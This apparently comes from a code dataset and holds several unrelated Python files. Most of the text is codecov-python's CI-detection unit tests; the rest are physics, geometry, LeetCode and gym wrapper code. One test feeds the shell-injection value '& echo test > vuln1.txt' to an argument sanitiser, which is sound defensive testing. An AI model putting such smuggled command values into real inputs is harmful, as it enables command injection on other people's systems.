\"No coverage report found\")\n else:\n raise Exception(\"Did not raise AssertionError\")\n\n def test_sanitize_arg(self):\n self.assertEqual(\n codecov.sanitize_arg(\"\", \"& echo test > vuln1.txt\"),\n \" echo test > vuln1.txt\",\n )\n\n @unittest.skipUnless(os.getenv(\"JENKINS_URL\"), \"Skip Jenkins CI test\")\n def test_ci_jenkins(self):\n self.set_env(\n BUILD_URL=\"https://....\",\n JENKINS_URL=\"https://....\",\n GIT_BRANCH=\"master\",\n GIT_COMMIT=\"c739768fcac68144a3a6d82305b9c4106934d31a\",\n BUILD_NUMBER=\"41\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"jenkins\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"c739768fcac68144a3a6d82305b9c4106934d31a\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"41\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://....\")\n self.assertEqual(res[\"query\"][\"pr\"], \"\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(os.getenv(\"JENKINS_URL\"), \"Skip Jenkins CI test\")\n def test_ci_jenkins_env(self):\n self.set_env(\n JENKINS_URL=\"https://....\",\n BUILD_URL=\"https://....\",\n ghprbSourceBranch=\"master\",\n ghprbActualCommit=\"c739768fcac68144a3a6d82305b9c4106934d31a\",\n ghprbPullId=\"1\",\n BUILD_NUMBER=\"41\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"jenkins\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"c739768fcac68144a3a6d82305b9c4106934d31a\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"41\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://....\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(os.getenv(\"JENKINS_URL\"), \"Skip Jenkins CI test\")\n def test_ci_jenkins_blue_ocean(self):\n self.set_env(\n JENKINS_URL=\"https://....\",\n BUILD_URL=\"https://....\",\n BRANCH_NAME=\"master\",\n CHANGE_ID=\"1\",\n BUILD_NUMBER=\"41\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"jenkins\")\n self.assertEqual(\n res[\"query\"][\"commit\"], codecov.check_output((\"git\", \"rev-parse\", \"HEAD\"))\n )\n self.assertEqual(res[\"query\"][\"build\"], \"41\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://....\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\"\n and os.getenv(\"TRAVIS\") == \"true\"\n and os.getenv(\"SHIPPABLE\") != \"true\",\n \"Skip Travis CI test\",\n )\n def test_ci_travis(self):\n self.set_env(\n TRAVIS=\"true\",\n TRAVIS_BRANCH=\"master\",\n TRAVIS_COMMIT=\"c739768fcac68144a3a6d82305b9c4106934d31a\",\n TRAVIS_REPO_SLUG=\"owner/repo\",\n TRAVIS_JOB_ID=\"33116958\",\n TRAVIS_TAG=\"v1.1.1\",\n TRAVIS_JOB_NUMBER=\"4.1\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"travis\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"c739768fcac68144a3a6d82305b9c4106934d31a\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"4.1\")\n self.assertEqual(res[\"query\"][\"pr\"], \"\")\n self.assertEqual(res[\"query\"][\"tag\"], \"v1.1.1\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"CI_NAME\") == \"codeship\",\n \"Skip Codeship CI test\",\n )\n def test_ci_codeship(self):\n self.set_env(\n CI_NAME=\"codeship\",\n CI_BRANCH=\"master\",\n CI_BUILD_NUMBER=\"20\",\n CI_BUILD_URL=\"https://codeship.io/build/1\",\n CI_COMMIT_ID=\"743b04806ea677403aa2ff26c6bdeb85005de658\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"codeship\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"743b04806ea677403aa2ff26c6bdeb85005de658\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"20\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://codeship.io/build/1\")\n self.assertEqual(res[\"query\"][\"pr\"], \"\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"CIRCLECI\") == \"true\",\n \"Skip Circle CI test\",\n )\n def test_ci_circleci(self):\n self.set_env(\n CIRCLECI=\"true\",\n CIRCLE_BUILD_NUM=\"57\",\n CIRCLE_NODE_INDEX=\"1\",\n CIRCLE_PR_NUMBER=\"1\",\n CIRCLE_BRANCH=\"master\",\n CIRCLE_PROJECT_USERNAME=\"owner\",\n CIRCLE_PROJECT_REPONAME=\"repo\",\n CIRCLE_SHA1=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"circleci\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"57.1\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"BUILDKITE\") == \"true\",\n \"Skip BuildKit CI test\",\n )\n def test_ci_buildkite(self):\n self.set_env(\n CI=\"true\",\n BUILDKITE=\"true\",\n BUILDKITE_BUILD_NUMBER=\"57\",\n BUILDKITE_JOB_ID=\"1\",\n BUILDKITE_BRANCH=\"master\",\n BUILDKITE_PROJECT_SLUG=\"owner/repo\",\n BUILDKITE_COMMIT=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"buildkite\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"57.1\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"SEMAPHORE\") == \"true\",\n \"Skip Semaphore CI test\",\n )\n def test_ci_semaphore(self):\n self.set_env(\n SEMAPHORE=\"true\",\n BRANCH_NAME=\"master\",\n SEMAPHORE_BUILD_NUMBER=\"10\",\n SEMAPHORE_CURRENT_THREAD=\"1\",\n SEMAPHORE_REPO_SLUG=\"owner/repo\",\n REVISION=\"743b04806ea677403aa2ff26c6bdeb85005de658\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"semaphore\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"743b04806ea677403aa2ff26c6bdeb85005de658\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"10.1\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"drone\" and os.getenv(\"DRONE\") == \"true\",\n \"Skip Drone CI test\",\n )\n def test_ci_drone(self):\n self.set_env(\n CI=\"drone\",\n DRONE=\"true\",\n DRONE_BUILD_NUMBER=\"10\",\n DRONE_BRANCH=\"master\",\n DRONE_BUILD_LINK=\"https://drone.io/github/builds/1\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"drone.io\")\n self.assertEqual(\n res[\"query\"][\"commit\"], codecov.check_output((\"git\", \"rev-parse\", \"HEAD\"))\n )\n self.assertEqual(res[\"query\"][\"build\"], \"10\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://drone.io/github/builds/1\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(os.getenv(\"SHIPPABLE\") == \"true\", \"Skip Shippable CI test\")\n def test_ci_shippable(self):\n self.set_env(\n SHIPPABLE=\"true\",\n BUILD_NUMBER=\"10\",\n REPO_NAME=\"owner/repo\",\n BRANCH=\"master\",\n BUILD_URL=\"https://shippable.com/...\",\n COMMIT=\"743b04806ea677403aa2ff26c6bdeb85005de658\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"shippable\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"743b04806ea677403aa2ff26c6bdeb85005de658\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"10\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://shippable.com/...\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n # @unittest.skipUnless(os.getenv('CI') == \"True\" and os.getenv('APPVEYOR') == 'True', 'Skip AppVeyor CI test')\n @unittest.skip(\"Skip AppVeyor test\")\n def test_ci_appveyor(self):\n self.set_env(\n APPVEYOR=\"True\",\n CI=\"True\",\n APPVEYOR_JOB_ID=\"9r2qufuu8\",\n APPVEYOR_BUILD_VERSION=\"1.2.3\",\n APPVEYOR_ACCOUNT_NAME=\"owner\",\n APPVEYOR_PROJECT_SLUG=\"repo\",\n APPVEYOR_PULL_REQUEST_NUMBER=\"1\",\n APPVEYOR_REPO_BRANCH=\"master\",\n APPVEYOR_REPO_NAME=\"owner/repo\",\n APPVEYOR_REPO_COMMIT=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli(file=self.filepath)\n self.assertEqual(res[\"query\"][\"service\"], \"appveyor\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"job\"], \"owner/repo/1.2.3\")\n self.assertEqual(res[\"query\"][\"build\"], \"9r2qufuu8\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"WERCKER_GIT_BRANCH\"),\n \"Skip Wercker CI test\",\n )\n def test_ci_wercker(self):\n self.set_env(\n WERCKER_GIT_BRANCH=\"master\",\n WERCKER_MAIN_PIPELINE_STARTED=\"1399372237\",\n WERCKER_GIT_OWNER=\"owner\",\n WERCKER_GIT_REPOSITORY=\"repo\",\n WERCKER_GIT_COMMIT=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"wercker\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"1399372237\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"MAGNUM\") == \"true\",\n \"Skip Magnum CI test\",\n )\n def test_ci_magnum(self):\n self.set_env(\n CI_BRANCH=\"master\",\n CI_BUILD_NUMBER=\"1399372237\",\n MAGNUM=\"true\",\n CI=\"true\",\n CI_COMMIT=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"magnum\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"1399372237\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI_SERVER_NAME\", \"\").startswith(\"GitLab\"), \"Skip GitLab CI test\"\n )\n def test_ci_gitlab_pre9(self):\n self.set_env(\n CI_BUILD_REF_NAME=\"master\",\n CI_BUILD_ID=\"1399372237\",\n CI_BUILD_REPO=\"https://gitlab.com/owner/repo.git\",\n CI_SERVER_NAME=\"GitLab CI\",\n CI_BUILD_REF=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n HOME=\"/\",\n CI_PROJECT_DIR=os.getcwd().strip(\"/\"),\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"gitlab\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"1399372237\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI_SERVER_NAME\", \"\").startswith(\"GitLab\"), \"Skip GitLab CI test\"\n )\n def test_ci_gitlab(self):\n self.set_env(\n CI_COMMIT_REF_NAME=\"master\",\n CI_JOB_ID=\"1399372237\",\n CI_REPOSITORY_URL=\"https://gitlab.com/owner/repo.git\",\n CI_SERVER_NAME=\"GitLab CI\",\n CI_COMMIT_SHA=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n HOME=\"/\",\n CI_PROJECT_DIR=os.getcwd().strip(\"/\"),\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"gitlab\")\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"1399372237\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"GITHUB_ACTION\"),\n \"Skip GitHub Actions CI test\",\n )\n def test_ci_github(self):\n self.set_env(\n HOME=\"/\",\n CODECOV_TOKEN=\"token\",\n CODECOV_NAME=\"name\",\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"github-actions\")\n self.assertEqual(res[\"query\"][\"commit\"], os.getenv(\"GITHUB_SHA\"))\n self.assertEqual(res[\"query\"][\"build\"], os.getenv(\"GITHUB_RUN_ID\"))\n self.assertEqual(res[\"query\"][\"slug\"], os.getenv(\"GITHUB_REPOSITORY\"))\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n\n @unittest.skipUnless(\n os.getenv(\"CI\") == \"true\" and os.getenv(\"CIRRUS_CI\") == \"true\",\n \"Skip Cirrus CI\",\n )\n def test_ci_cirrus(self):\n # The data used in this test follows the test case data in\n # https://github.com/codecov/codecov-bash/pull/127\n # Discussion about using codecov without token for Cirrus CI can be seen in:\n # https://community.codecov.com/t/add-support-of-uploading-from-cirrus-ci-without-token/1028/36\n self.set_env(\n HOME=\"/\",\n CIRRUS_CI=\"true\",\n CIRRUS_REPO_FULL_NAME=\"codecov/ci-repo\",\n CIRRUS_BRANCH=\"master\",\n CIRRUS_PR=\"1\",\n CIRRUS_CHANGE_IN_REPO=\"180c0d097354fc1a451da8a3be5aba255f2ffd9f\",\n CIRRUS_BUILD_ID=\"777\",\n CIRRUS_TASK_ID=\"239\",\n CIRRUS_TASK_NAME=\"test\"\n )\n self.fake_report()\n res = self.run_cli()\n self.assertEqual(res[\"query\"][\"service\"], \"cirrus-ci\")\n self.assertEqual(res[\"query\"][\"slug\"], \"codecov/ci-repo\")\n self.assertEqual(res[\"query\"][\"branch\"], \"master\")\n self.assertEqual(res[\"query\"][\"pr\"], \"1\")\n self.assertEqual(res[\"query\"][\"commit\"], os.getenv(\"CIRRUS_CHANGE_IN_REPO\"))\n self.assertEqual(res[\"query\"][\"build\"], \"777\")\n self.assertEqual(res[\"query\"][\"build_url\"], \"https://cirrus-ci.com/task/239\")\n self.assertEqual(res[\"query\"][\"job\"], \"test\")\n\n @unittest.skip(\"Skip CI None\")\n def test_ci_none(self):\n self.set_env(CODECOV_TOKEN=\"token\", CODECOV_NAME=\"name\")\n self.fake_report()\n res = self.run_cli(\n build=10,\n commit=\"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\",\n slug=\"owner/repo\",\n token=\"token\",\n )\n self.assertEqual(res[\"query\"].get(\"service\"), None)\n self.assertEqual(\n res[\"query\"][\"commit\"], \"d653b934ed59c1a785cc1cc79d08c9aaa4eba73b\"\n )\n self.assertEqual(res[\"query\"][\"build\"], \"10\")\n self.assertEqual(res[\"query\"][\"slug\"], \"owner/repo\")\n self.assertEqual(res[\"codecov\"].token, \"token\")\n self.assertEqual(res[\"codecov\"].name, \"name\")\n","repo_name":"codecov/codecov-python","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":33982,"program_lang":"python","lang":"en","doc_type":"code","stars":185,"dataset":"github-code","pt":"5"} +{"seq_id":"1732213166","text":"from bangundatar import rumusLuas_Persegi, rumusKeliling_Persegi, rumusLuas_PersegiPanjang, rumusKeliling_PersegiPanjang, rumusLuas_Segitiga, rumusKeliling_Segitiga, rumusLuas_Lingkaran, rumusKeliling_Lingkaran\ndef persegi():\n print(\"1. Luas persegi\")\n print(\"2. Keliling persegi\")\n pilihan = input(\"Masukkan Rumus yang akan anda gunakan: \")\n while True:\n if pilihan == \"1\":\n rumusLuas_Persegi()\n break\n elif pilihan == \"2\":\n rumusKeliling_Persegi()\n break\n else:\n pilihan= input(\"Maaf, pilihan anda tidak tersedia. Pilih Kembali: \")\n\ndef persegi_panjang():\n print(\"1. Luas persegi Panjang\")\n print(\"2. Keliling persegi Panjang\")\n pilihan = input(\"Masukkan Rumus yang akan anda gunakan: \")\n while True:\n if pilihan == \"1\":\n rumusLuas_PersegiPanjang()\n break\n elif pilihan == \"2\":\n rumusKeliling_PersegiPanjang()\n break\n else:\n pilihan= input(\"Maaf, pilihan anda tidak tersedia. Pilih Kembali: \")\n\ndef Segitiga():\n print(\"1. Luas Segitiga\")\n print(\"2. Keliling Segitiga\")\n pilihan = input(\"Masukkan Rumus yang akan anda gunakan: \")\n while True:\n if pilihan == \"1\":\n rumusLuas_Segitiga()\n break\n elif pilihan == \"2\":\n rumusKeliling_Segitiga()\n break\n else:\n pilihan= input(\"Maaf, pilihan anda tidak tersedia. Pilih Kembali: \")\n\ndef Lingkaran():\n print(\"1. Luas Lingkaran\")\n print(\"2. Keliling Lingkaran\")\n pilihan = input(\"Masukkan Rumus yang akan anda gunakan: \")\n while True:\n if pilihan == \"1\":\n rumusLuas_Lingkaran()\n break\n elif pilihan == \"2\":\n rumusKeliling_Lingkaran()\n break\n else:\n pilihan= input(\"Maaf, pilihan anda tidak tersedia. Pilih Kembali: \") \n","repo_name":"fahrilshaputraa/TugasPyBootcamp","sub_path":"wildan/tugas bangun datar/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"883868055","text":"import sys\nimport os\nimport numpy as np\nimport pandas as pd\npd.options.mode.chained_assignment = None\n\nfrom fax_production_process import ProductionProcess\nimport hax\n\n\nclass BuildMiniTree(ProductionProcess):\n '''Run hax to create minitree'''\n\n process_oerder = 5\n __version__ = '0.0.1'\n\n def _check(self):\n return os.path.isfile('{minitree_pickle_path}/{production_id}.h5'.format(minitree_pickle_path=self.config['DIRECTORY']['minitree_pickle'], production_id=self.production_id))\n\n def hax_init(self, force_reload=False):\n self.main_data_path = self.config['DIRECTORY']['processed']\n self.minitree_path = self.config['DIRECTORY']['minitree']\n\n # Trick learned from Daniel Coderre's DAQVeto lichen\n if (not len(hax.config)) or force_reload:\n # User didn't init hax yet... let's do it now\n hax.init(experiment='XENON1T',\n main_data_paths=[self.main_data_path],\n minitree_paths=[self.minitree_path],\n version_policy='loose'\n )\n\n elif not (self.main_data_path in hax.config['main_data_paths']):\n hax.config['main_data_paths'] = ['.', self.main_data_path]\n\n elif not (self.minitree_path == hax.config['minitree_paths'][0]):\n hax.config['minitree_paths'] = [self.minitree_path]\n\n def _process(self):\n self.hax_init(force_reload=False)\n self.minitree_pickle_path = self.config['DIRECTORY']['minitree_pickle']\n\n with self._divert_stdout():\n self.df = hax.minitrees.load(\n self.production_id, ['Basics', 'Fundamentals'])\n self.df.to_hdf(os.path.join(\n self.minitree_pickle_path, '{name}.h5'.format(name=self.production_id)), 'table')\n print('{production_id} minitrees building success :)'.format(\n production_id=self.production_id))\n","repo_name":"XENON1T/processing","sub_path":"montecarlo/fax_waveform_py/production_process/BuildMinitree.py","file_name":"BuildMinitree.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37130028079","text":"\"\"\"\nA module to encapsulate a Likelihood source model xml file.\n\n@author J. Chiang \n\n$Header$\n\"\"\"\nimport os, sys\nfrom xml.dom import minidom\nfrom cleanXml import cleanXml\n\ndefaultModel = '\\n'.join( ('',\n '',\n '') )\n\nclass SourceModel:\n def __init__(self, xmlFile=None):\n if xmlFile and os.path.isfile(xmlFile):\n self.filename = xmlFile.strip(\" \")\n self.doc = minidom.parse(self.filename)\n else:\n self.filename = xmlFile\n self.doc = minidom.parseString(defaultModel)\n srcs = self.doc.getElementsByTagName(\"source\")\n self.srcList = {}\n try:\n for src in srcs:\n self.srcList[src.getAttribute(\"name\")] = Source(src)\n except ValueError:\n pass\n def setAttributes(self):\n for src in self.srcList.values():\n src.setAttributes()\n def __getitem__(self, name):\n return self.srcList[name]\n def __setitem__(self, name, value):\n self.srcList[name] = value\n source_library = self.doc.getElementsByTagName('source_library')[0]\n source_library.appendChild(value.node)\n def __delitem__(self, name):\n source_library = self.doc.getElementsByTagName('source_library')[0]\n source_library.removeChild(self.srcList[name].node)\n del self.srcList[name]\n def names(self):\n return self.srcList.keys()\n def writeTo(self, filename=None):\n if filename == None: # Overwrite the existing file.\n filename = self.filename\n self.setAttributes()\n try:\n doc = cleanXml(self.doc)\n except:\n doc = self.doc\n file = open(filename, 'w')\n file.write(doc.toxml() + '\\n')\n file.close()\n self.filename = filename\n\nclass DomElement:\n def __init__(self, node, converter=None):\n self.node = node\n attributes = {}\n for key in node.attributes.keys():\n if converter and key != \"name\" and key != \"free\":\n attributes[key] = converter(node.getAttribute(key))\n# An ugly kludge here since each Parameter's \"free\" flag needs to be int.\n elif key == \"free\":\n attributes[key] = int(node.getAttribute(key))\n else:\n attributes[key] = node.getAttribute(key)\n self.__dict__.update(attributes)\n def deleteChildElements(self, tagName):\n children = self.node.getElementsByTagName(tagName)\n for child in children:\n self.node.removeChild(child)\n def setAttributes(self):\n for key in self.node.attributes.keys():\n self.node.setAttribute(key, \"%s\" % self.__dict__[key])\n \nclass Source(DomElement):\n def __init__(self, node):\n DomElement.__init__(self, node)\n self.functions = {}\n (spectrum, ) = node.getElementsByTagName(\"spectrum\")\n self.functions[\"spectrum\"] = Function(spectrum)\n (spatialModel, ) = node.getElementsByTagName(\"spatialModel\")\n self.functions[\"spatialModel\"] = Function(spatialModel)\n self.__dict__.update(self.functions)\n self.show = 1\n def setAttributes(self):\n DomElement.setAttributes(self)\n for func in self.functions.values():\n func.setAttributes()\n def summary(self):\n if self.type == \"PointSource\":\n (line, ) = (\"%s: %.2f; (RA, Dec) = (%.2f, %.2f)\"\n % (self.name, self.flux(), \n self.spatialModel.RA.value,\n self.spatialModel.DEC.value), )\n else:\n line = \"%s: %.2f\" % (self.name, self.spectrum.Prefactor.value)\n return line\n def flux(self, emin=30):\n (prefactor, ) = (self.spectrum.Prefactor.value\n *self.spectrum.Prefactor.scale, )\n gamma = -self.spectrum.Index.value\n e0 = self.spectrum.Scale.value\n return prefactor*e0/(gamma-1)*(emin/e0)**(1.-gamma)*1e8\n\nclass Function(DomElement):\n def __init__(self, node):\n DomElement.__init__(self, node)\n self.parameters = {}\n paramElements = node.getElementsByTagName(\"parameter\")\n for param in paramElements:\n name = param.getAttribute(\"name\")\n self.parameters[name] = Parameter(param)\n self.__dict__.update(self.parameters)\n def setAttributes(self):\n DomElement.setAttributes(self)\n for param in self.parameters.values():\n param.setAttributes()\n\nclass Parameter(DomElement):\n def __init__(self, node):\n DomElement.__init__(self, node, float)\n","repo_name":"fermi-lat/sane","sub_path":"python/readXml.py","file_name":"readXml.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29576306512","text":"class Solution:\n def maxPoints(self, points: List[List[int]]) -> int:\n \"\"\"\n RUNTIME: 66 ms (97.37%)\n MEMORY: 13.9 MB (75.79%)\n \"\"\"\n ans = 0\n for i in range(len(points)):\n hashmap = {}\n for j in range(i):\n slope = self.getSlope(points[i], points[j])\n hashmap[slope] = 1 + hashmap.get(slope,0)\n if hashmap.values():\n ans = max(ans, max(hashmap.values()))\n return ans + 1\n\n def getSlope(self, p1, p2):\n if p1[0] - p2[0] == 0:\n return 'inf'\n return (p1[1] - p2[1]) / (p1[0] - p2[0])\n","repo_name":"bxtbold/coding-solutions","sub_path":"leetcode/0149-max-points-on-a-line/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"38025405523","text":"import gym\nimport numpy as np\nfrom scipy.linalg import circulant\nfrom gym.spaces import Tuple, Box, Dict\nfrom copy import deepcopy\n\n\nclass SplitMultiAgentActions(gym.ActionWrapper):\n '''\n Splits mujoco generated actions into a dict of tuple actions.\n '''\n def __init__(self, env):\n super().__init__(env)\n self.n_agents = self.metadata['n_actors']\n lows = np.split(self.action_space.low, self.n_agents)\n highs = np.split(self.action_space.high, self.n_agents)\n self.action_space = Dict({\n 'action_movement': Tuple([Box(low=low, high=high, dtype=self.action_space.dtype)\n for low, high in zip(lows, highs)])\n })\n\n def action(self, action):\n return action['action_movement'].flatten()\n\n\nclass JoinMultiAgentActions(gym.ActionWrapper):\n def __init__(self, env):\n super().__init__(env)\n self.n_agents = self.metadata['n_actors']\n low = np.concatenate([space.low for space in self.action_space.spaces])\n high = np.concatenate([space.high for space in self.action_space.spaces])\n self.action_space = Box(low=low, high=high, dtype=self.action_space.spaces[0].dtype)\n\n def action(self, action):\n # action should be a tuple of different agent actions\n return np.split(action, self.n_agents)\n\n\nclass SplitObservations(gym.ObservationWrapper):\n \"\"\"\n Split observations for each agent.\n Args:\n keys_self: list of observation names which are agent specific. E.g. this will\n permute qpos such that each agent sees its own qpos as the first numbers\n keys_copy: list of observation names that are just passed down as is\n keys_self_matrices: list of observation names that should be (n_agent, n_agent, dim) where\n each agent has a custom observation of another agent. This is different from self_keys\n in that self_keys we assume that observations are symmetric, whereas these can represent\n unique pairwise interactions/observations\n \"\"\"\n def __init__(self, env, keys_self, keys_copy=[], keys_self_matrices=[]):\n super().__init__(env)\n self.keys_self = sorted(keys_self)\n self.keys_copy = sorted(keys_copy)\n self.keys_self_matrices = sorted(keys_self_matrices)\n 